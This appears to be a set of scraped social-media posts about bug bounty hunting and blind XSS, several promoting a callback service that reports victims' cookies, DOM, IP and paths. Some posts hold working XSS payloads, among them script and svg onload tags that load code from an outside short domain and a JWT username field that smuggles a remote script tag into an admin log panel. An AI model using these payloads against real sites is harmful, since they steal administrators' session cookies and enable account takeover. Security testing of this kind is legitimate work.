Looking for security researcher with great public profile. Remote. API / AI exploits focus on novel techniques. No XSSers please ;) reply here or DM. Please repost
@OreoB1scuit @Freyxfi @intigriti Th victim is the admin page which is vulnerable to xss if it is vulnerable to xss a notification comes (containing the cookie, Dom elememts,ip,the website and path) if you use an online platform like https://t.co/DxLJx8BOwp for the payloads this is blind xss by the way
You can easily test your XSS payloads with this 3-character domain name.
<script src='//ใ.๏ฌ'>
<svg/onload=import('//ใ.๏ฌ')>
#xss@xssreport
Users who have obtained VIP access for testing can now use a 4-character domain name, excluding the username.
You will be able to access more with the additional features we will be introducing soon.
We have special surprises coming soon that we will be announcing.
๐ Blind XSS: The invisible injection point and delayed execution make them an easily overlooked vulnerability... ๐ง
Yet, they still have a severe impact on any organisation! ๐ค
In our technical article, we documented our methodology for finding blind XSS vulnerabilities, including a few cool payloads you could try next time you're testing a target for blind XSS!
Link in post below! ๐
After sending requests, the error logs started reflecting my payload.
1 hour laterโฆ I heard the @xssreport Telegram notification sound.
And yes, it triggered.
XSS achieved. ๐ฏ
#bugbounty#infosec#xss
๐จ Sharing an unbelievable XSS scenario.
Why? Because @XSSReport users know XSS is not just an alert(1), it's an art.
One of our followers analyzed the architecture, studied the attack surface, and came up with this ๐
At this point, I thought:
What if these logs are being processed in a private panel? ๐ค So I crafted this JWT payload:
{
"username": "test3rbb'\"><script src=https://t.co/GGlzDEogxU></script>",
"guid": "bd874709-aac7-485a-a46d-6e33964ea930",
"iat": 1754042605
}